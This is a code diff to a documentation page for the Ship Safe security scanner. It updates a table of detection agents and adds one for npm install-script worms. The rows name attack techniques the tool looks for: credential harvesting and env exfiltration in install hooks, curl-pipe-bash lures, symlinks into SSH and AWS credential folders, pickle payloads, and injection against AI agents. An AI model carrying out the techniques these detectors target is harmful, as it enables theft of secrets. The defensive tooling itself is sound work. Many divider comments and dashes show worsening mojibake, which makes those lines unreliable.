+            {/* ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ Agents ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ */}
             <section id="agents">
-              <h2>28 Security Agents</h2>
+              <h2>29 Security Agents</h2>
               <p>All agents run in parallel with per-agent timeouts. Each implements <code>shouldRun(recon)</code> to skip irrelevant projects automatically.</p>
               <div className={styles.tableWrap}>
                 <table>
@@ -281,22 +281,23 @@ npx ship-safe ci . --threshold 80`}</code></pre>
                     <tr><td><strong>GitHistoryScanner</strong></td><td>Secrets</td><td>Leaked secrets in git commit history</td></tr>
                     <tr><td><strong>CICDScanner</strong></td><td>CI/CD</td><td>OWASP CI/CD Top 10: pipeline poisoning, unpinned actions, secret logging</td></tr>
                     <tr><td><strong>APIFuzzer</strong></td><td>API</td><td>Routes without auth, mass assignment, GraphQL introspection, debug endpoints</td></tr>
-                    <tr><td><strong>ManagedAgentScanner</strong></td><td>AI/LLM</td><td>Claude Managed Agent misconfigs Ã¢ÂÂ always_allow policies, unrestricted networking, unpinned packages</td></tr>
-                    <tr><td><strong>HermesSecurityAgent</strong></td><td>AI/LLM</td><td>Hermes Agent deployments Ã¢ÂÂ tool registry poisoning, function-call injection, skill permission drift (ASI-01Ã¢ÂÂASI-10)</td></tr>
-                    <tr><td><strong>AgentAttestationAgent</strong></td><td>Supply Chain</td><td>Agent manifest supply chain Ã¢ÂÂ unpinned versions, missing integrity hashes, unsigned manifests (ASI-10, SLSA Level 0)</td></tr>
-                    <tr><td><strong>AgenticSupplyChainAgent</strong></td><td>Supply Chain</td><td>AI integration supply chain Ã¢ÂÂ over-privileged AI CI actions, OAuth scope creep, unsigned AI webhook receivers (ASI-02, ASI-06, CICD-SEC-8)</td></tr>
-                    <tr><td><strong>RobloxSecurityAgent</strong></td><td>Supply Chain</td><td>Malicious Roblox/Luau Toolbox assets Ã¢ÂÂ runtime asset injection (<code>game:GetObjects(&apos;rbxassetid://&apos;)</code>, <code>require(assetId)</code>), <code>HttpEnabled</code> from scripts, obfuscated loaders, and payloads hidden in instance attributes (decoded from <code>.rbxmx</code>/<code>.rbxlx</code>) Ã¢ÂÂ (CWE-506, CWE-829)</td></tr>
-                    <tr><td><strong>ModelScanAgent</strong></td><td>Supply Chain</td><td>ML model supply chain Ã¢ÂÂ code-execution payloads in pickle-based weights (<code>.pt</code>/<code>.pkl</code>/<code>.ckpt</code>/<code>.bin</code>), <code>torch.load</code> without <code>weights_only=True</code>, and archive-wrapped scanner evasion (CWE-502, CWE-506)</td></tr>
-                    <tr><td><strong>TrustBoundaryAgent</strong></td><td>Agentic</td><td>AI coding-agent trust boundary Ã¢ÂÂ GhostApproval symlinks (config-named links into <code>~/.ssh</code>/<code>~/.aws</code>/<code>.env</code>), symlinks escaping the repo, and Friendly Fire run-on-review/curl-pipe-bash instructions in agent-read files (CWE-59, CWE-61)</td></tr>
-                    <tr><td><strong>SlopSquatAgent</strong></td><td>Supply Chain</td><td>Slopsquatting / hallucinated packages â imports that are neither declared in <code>package.json</code>, present in <code>node_modules</code>, nor Node builtins (the slot attackers register), plus documented AI-hallucinated names (CWE-1357)</td></tr>
-                    <tr><td><strong>ClickFixAgent</strong></td><td>Supply Chain</td><td>ClickFix / fake-CAPTCHA paste-and-run social engineering — fake error framing next to Win+R/Ctrl+V/command-bar keystrokes and PowerShell cradles, plus fake-installer <code>preinstall</code>/<code>postinstall</code> scripts (CWE-1357, CWE-506)</td></tr>
+                    <tr><td><strong>ManagedAgentScanner</strong></td><td>AI/LLM</td><td>Claude Managed Agent misconfigs ÃÂ¢ÃÂÃÂ always_allow policies, unrestricted networking, unpinned packages</td></tr>
+                    <tr><td><strong>HermesSecurityAgent</strong></td><td>AI/LLM</td><td>Hermes Agent deployments ÃÂ¢ÃÂÃÂ tool registry poisoning, function-call injection, skill permission drift (ASI-01ÃÂ¢ÃÂÃÂASI-10)</td></tr>
+                    <tr><td><strong>AgentAttestationAgent</strong></td><td>Supply Chain</td><td>Agent manifest supply chain ÃÂ¢ÃÂÃÂ unpinned versions, missing integrity hashes, unsigned manifests (ASI-10, SLSA Level 0)</td></tr>
+                    <tr><td><strong>AgenticSupplyChainAgent</strong></td><td>Supply Chain</td><td>AI integration supply chain ÃÂ¢ÃÂÃÂ over-privileged AI CI actions, OAuth scope creep, unsigned AI webhook receivers (ASI-02, ASI-06, CICD-SEC-8)</td></tr>
+                    <tr><td><strong>RobloxSecurityAgent</strong></td><td>Supply Chain</td><td>Malicious Roblox/Luau Toolbox assets ÃÂ¢ÃÂÃÂ runtime asset injection (<code>game:GetObjects(&apos;rbxassetid://&apos;)</code>, <code>require(assetId)</code>), <code>HttpEnabled</code> from scripts, obfuscated loaders, and payloads hidden in instance attributes (decoded from <code>.rbxmx</code>/<code>.rbxlx</code>) ÃÂ¢ÃÂÃÂ (CWE-506, CWE-829)</td></tr>
+                    <tr><td><strong>ModelScanAgent</strong></td><td>Supply Chain</td><td>ML model supply chain ÃÂ¢ÃÂÃÂ code-execution payloads in pickle-based weights (<code>.pt</code>/<code>.pkl</code>/<code>.ckpt</code>/<code>.bin</code>), <code>torch.load</code> without <code>weights_only=True</code>, and archive-wrapped scanner evasion (CWE-502, CWE-506)</td></tr>
+                    <tr><td><strong>TrustBoundaryAgent</strong></td><td>Agentic</td><td>AI coding-agent trust boundary ÃÂ¢ÃÂÃÂ GhostApproval symlinks (config-named links into <code>~/.ssh</code>/<code>~/.aws</code>/<code>.env</code>), symlinks escaping the repo, and Friendly Fire run-on-review/curl-pipe-bash instructions in agent-read files (CWE-59, CWE-61)</td></tr>
+                    <tr><td><strong>SlopSquatAgent</strong></td><td>Supply Chain</td><td>Slopsquatting / hallucinated packages Ã¢ÂÂ imports that are neither declared in <code>package.json</code>, present in <code>node_modules</code>, nor Node builtins (the slot attackers register), plus documented AI-hallucinated names (CWE-1357)</td></tr>
+                    <tr><td><strong>ClickFixAgent</strong></td><td>Supply Chain</td><td>ClickFix / fake-CAPTCHA paste-and-run social engineering â fake error framing next to Win+R/Ctrl+V/command-bar keystrokes and PowerShell cradles, plus fake-installer <code>preinstall</code>/<code>postinstall</code> scripts (CWE-1357, CWE-506)</td></tr>
+                    <tr><td><strong>InstallGuardAgent</strong></td><td>Supply Chain</td><td>npm worm hardening (Shai-Hulud/Miasma) — <code>pre/postinstall</code> credential harvesting, env exfiltration, destructive commands, obfuscated <code>node -e</code>, and weaponized <code>binding.gyp</code> node-gyp actions (CWE-506, CWE-829)</td></tr>
                   </tbody>
                 </table>
               </div>
               <p><strong>Post-processors:</strong> ScoringEngine (8-category weighted scoring), VerifierAgent (secrets liveness verification), DeepAnalyzer (LLM-powered taint analysis)</p>
             </section>
 
-            {/* Ã¢ÂÂÃ¢ÂÂ Scoring Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
+            {/* ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ Scoring ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ */}
             <section id="scoring">
               <h2>Scoring System</h2>
               <p>Starts at 100. Each finding deducts points by severity and category, weighted by confidence level (high: 100%, medium: 60%, low: 30%).</p>
@@ -319,7 +320,7 @@ npx ship-safe ci . --threshold 80`}</code></pre>
               <p><strong>Exit codes:</strong> <code>0</code> for A/B (&gt;= 75), <code>1</code> for C/D/F. Use in CI to fail builds.</p>
             </section>
 
-            {/* Ã¢ÂÂÃ¢ÂÂ CI/CD Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
+            {/* ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ CI/CD ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ */}
             <section id="cicd">
               <h2>CI/CD Integration</h2>
               <pre><code>{`# Basic CI: fail if score < 75
@@ -339,7 +340,7 @@ npx ship-safe ci . --baseline`}</code></pre>
               <p>Export formats: <code>--json</code>, <code>--sarif</code>, <code>--csv</code>, <code>--md</code>, <code>--html</code>, <code>--pdf</code></p>
             </section>
 
-            {/* Ã¢ÂÂÃ¢ÂÂ GitHub Action Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
+            {/* ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ GitHub Action ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ */}
             <section id="github-action">
               <h2>GitHub Action</h2>
               <pre><code>{`# .github/workflows/security.yml
@@ -380,7 +381,7 @@ jobs:
               </div>
             </section>
 
-            {/* Ã¢ÂÂÃ¢ÂÂ LLM Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
+            {/* ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ LLM ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ */}
             <section id="llm">
               <h2>Multi-LLM Support</h2>
               <p>AI classification is optional. All core commands work fully offline. Use <code>--provider &lt;name&gt;</code> or set the matching environment variable.</p>
@@ -405,7 +406,7 @@ jobs:
               </div>
             </section>
 
-            {/* Ã¢ÂÂÃ¢ÂÂ Incremental Scanning Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
+            {/* ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ Incremental Scanning ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ */}
             <section id="scanning">
               <h2>Incremental Scanning</h2>
               <p>Ship Safe caches file hashes and findings in <code>.ship-safe/context.json</code>. Only changed files are re-scanned on subsequent runs.</p>
@@ -417,7 +418,7 @@ jobs:
               <p>LLM responses are cached in <code>.ship-safe/llm-cache.json</code> with a 7-day TTL to reduce API costs.</p>
             </section>
 
-            {/* Ã¢ÂÂÃ¢ÂÂ Suppression Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
+            {/* ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ Suppression ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ */}
             <section id="suppression">
               <h2>Suppressing Findings</h2>
               <p><strong>Inline:</strong> Add <code># ship-safe-ignore</code> on any line:</p>
@@ -431,7 +432,7 @@ tests/fixtures/
 docs/`}</code></pre>
             </section>
 
-            {/* Ã¢ÂÂÃ¢ÂÂ Policy Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
+            {/* ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ Policy ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ */}
             <section id="policy">
               <h2>Policy-as-Code</h2>
               <pre><code>{`npx ship-safe policy init`}</code></pre>
@@ -445,7 +446,7 @@ docs/`}</code></pre>
 }`}</code></pre>
             </section>
 
-            {/* Ã¢ÂÂÃ¢ÂÂ OWASP Ã¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂÃ¢ÂÂ */}
+            {/* ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ OWASP ÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂÃÂ¢ÃÂÃÂ */}
             <section id="owasp">
               <h2>OWASP Coverage</h2>
               <div className={styles.tableWrap}>
@@ -463,7 +464,7 @@ docs/`}</code></pre>
               <p>Compliance mapping to SOC 2 Type II, ISO 27001:2022, and NIST AI RMF is included in audit reports.</p>
             </section>
 
